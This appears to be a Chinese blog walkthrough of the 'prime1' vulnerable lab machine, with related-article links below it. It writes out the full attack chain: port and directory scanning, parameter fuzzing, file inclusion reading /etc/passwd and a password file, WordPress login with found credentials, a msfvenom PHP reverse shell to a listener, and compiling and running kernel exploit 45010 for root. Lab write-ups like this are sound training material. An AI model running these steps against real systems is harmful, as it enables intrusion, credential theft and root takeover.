热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

靶场prime1练习

以下是靶场地址下载安装该虚拟机,以下是虚拟机打开界面1、探测开放端口nmap-p1-65535-A192.168.133.1392、端口进行扫描,发现

以下是靶场地址

下载安装该虚拟机,以下是虚拟机打开界面

1、探测开放端口

nmap -p 1-65535 -A 192.168.133.139

2、端口进行扫描,发现存在22端口和80端口访问80端口,如图所示:

注:

1查看网页源码

2目录扫描

3F12 3.利用kali自带目录扫描工具进行扫描

1dirb http://192.168.133.139/

2dirb http://192.168.133.139  -X .txt,.zip,.php

 (3)wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.133.139/ind ex.php?FUZZ

成功获得参数file,但结果却不尽人意,挖错文件名了

 

不过不灰心,之前我们忽略了一个参数,我们可以搞一波

curl    http://192.168.133.139/index.php?file=location.txt

注:如何将kali文件下载到物理机

sz file   /usr/share/wfuzz/wordlist/general/common.txt   (字典路径) 4.找到正确的参数以后进行执行

curl  http://192.168.133.139/image.php?secrettier360=aaahttp://192.168.133.139/image.php?secrettier360=aaa

注:提示我们终于获得正确的参数

3、利用参数请求查看passwd文件,成功获取敏感信息http://192.168.133.139/image.php?secrettier360=/etc/passwd

 就在此时一个新大陆出现了

 

curl     http://192.168.133.139/index.php?secrettier360=/home/saket/password.txt 

 

curl    http://192.168.133.139/image.php?secrettier360=/home/saket/password.txt 

 

4、在之前我们通过目录扫描发现存在wordpress的目录,进行访问,存在登录界面,通过观察页面得到用 户名 

 

5、利用kali自带工具cmseek进行指纹信息收集,有点尴尬,这个工具没有,我进行了下载 

 

注:也可以利用wpscan   进行漏洞信息收集

wpscan --url http://192.168.133.139/wordpress/ --enumerate u

6、 利用找出的用户名和密码进行登录     用户名:victor 密码:follow_the_ippsec,成功登录后台

登录后台以后首先想找上传点,比如上传图片、上传文件等等 

7、利用msf生成反弹链接

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.133.129   lport=7777 -o shell.php

 

点击保存,保存成功。

8、利用msfconsole进行监听反弹shell,通过访问写入反弹shellphp文件触发,成功弹回shell

use exploit/mulit/handler
set payload php/meterpreter/reverse_tcp set lhost 192.168.133.129
set lport 7777
exploit

 得出Linux内核版本

9、 通过msfconsole 查找相关漏洞

searchsploit 16.04 Ubuntu

msfconsole的数据存储 cd /usr/share/exploitdb/exploits/linux

 cp 45010.c /root

重新进行编译

gcc 45010.c

gcc 45010.c -o 45010

在之前获取到meterpreter那里进行上传

upload  /root/45010 /tmp/45010

 进行提权

shell #进行shell执行

cd /tmp #进入tmp文件中chmod +x 45010 #权限提升

./45010 #执行

whoami   #查看当前权限450

10、成功拿到root权限以后,在root权限下会存放一些重要的文件

 

 成功获取flag值


推荐阅读
  • 如何实现织梦DedeCms全站伪静态
    本文介绍了如何通过修改织梦DedeCms源代码来实现全站伪静态,以提高管理和SEO效果。全站伪静态可以避免重复URL的问题,同时通过使用mod_rewrite伪静态模块和.htaccess正则表达式,可以更好地适应搜索引擎的需求。文章还提到了一些相关的技术和工具,如Ubuntu、qt编程、tomcat端口、爬虫、php request根目录等。 ... [详细]
  • Metasploit攻击渗透实践
    本文介绍了Metasploit攻击渗透实践的内容和要求,包括主动攻击、针对浏览器和客户端的攻击,以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码,以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]
  • 本文介绍了一些好用的搜索引擎的替代品,包括网盘搜索工具、百度网盘搜索引擎等。同时还介绍了一些笑话大全、GIF笑话图片、动态图等资源的搜索引擎。此外,还推荐了一些迅雷快传搜索和360云盘资源搜索的网盘搜索引擎。 ... [详细]
  • Webmin远程命令执行漏洞复现及防护方法
    本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法,同时提供了防护方法。漏洞存在于Webmin的找回密码页面中,攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外,还指出了参考链接中的数据包不准确的问题,并解释了漏洞触发的条件。最后,给出了防护方法以避免受到该漏洞的攻击。 ... [详细]
  • 本文介绍了在Vue项目中如何结合Element UI解决连续上传多张图片及图片编辑的问题。作者强调了在编码前要明确需求和所需要的结果,并详细描述了自己的代码实现过程。 ... [详细]
  • 本文介绍了使用cacti监控mssql 2005运行资源情况的操作步骤,包括安装必要的工具和驱动,测试mssql的连接,配置监控脚本等。通过php连接mssql来获取SQL 2005性能计算器的值,实现对mssql的监控。详细的操作步骤和代码请参考附件。 ... [详细]
  • 图像因存在错误而无法显示 ... [详细]
  • 本文介绍了如何在使用emacs时去掉ubuntu的alt键默认功能,并提供了相应的操作步骤和注意事项。 ... [详细]
  • Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施
    本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响,并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架,常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中,与Spring控制器一起使用时,存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节,并给出了防范该漏洞的建议措施。 ... [详细]
  • tcpdump 4.5.1 crash 深入分析
    tcpdump 4.5.1 crash 深入分析 ... [详细]
  • 如何使用PLEX播放组播、抓取信号源以及设置路由器
    本文介绍了如何使用PLEX播放组播、抓取信号源以及设置路由器。通过使用xTeve软件和M3U源,用户可以在PLEX上实现直播功能,并且可以自动匹配EPG信息和定时录制节目。同时,本文还提供了从华为itv盒子提取组播地址的方法以及如何在ASUS固件路由器上设置IPTV。在使用PLEX之前,建议先使用VLC测试是否可以正常播放UDPXY转发的iptv流。最后,本文还介绍了docker版xTeve的设置方法。 ... [详细]
  • centos6.8 下nginx1.10 安装 ... [详细]
  • 浅解XXE与Portswigger Web Sec
    XXE与PortswiggerWebSec​相关链接:​博客园​安全脉搏​FreeBuf​XML的全称为XML外部实体注入,在学习的过程中发现有回显的XXE并不多,而 ... [详细]
  • [译]技术公司十年经验的职场生涯回顾
    本文是一位在技术公司工作十年的职场人士对自己职业生涯的总结回顾。她的职业规划与众不同,令人深思又有趣。其中涉及到的内容有机器学习、创新创业以及引用了女性主义者在TED演讲中的部分讲义。文章表达了对职业生涯的愿望和希望,认为人类有能力不断改善自己。 ... [详细]
  • 本文介绍了在Ubuntu 11.10 x64环境下安装Android开发环境的步骤,并提供了解决常见问题的方法。其中包括安装Eclipse的ADT插件、解决缺少GEF插件的问题以及解决无法找到'userdata.img'文件的问题。此外,还提供了相关插件和系统镜像的下载链接。 ... [详细]
author-avatar
我-是二毛控控控_
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有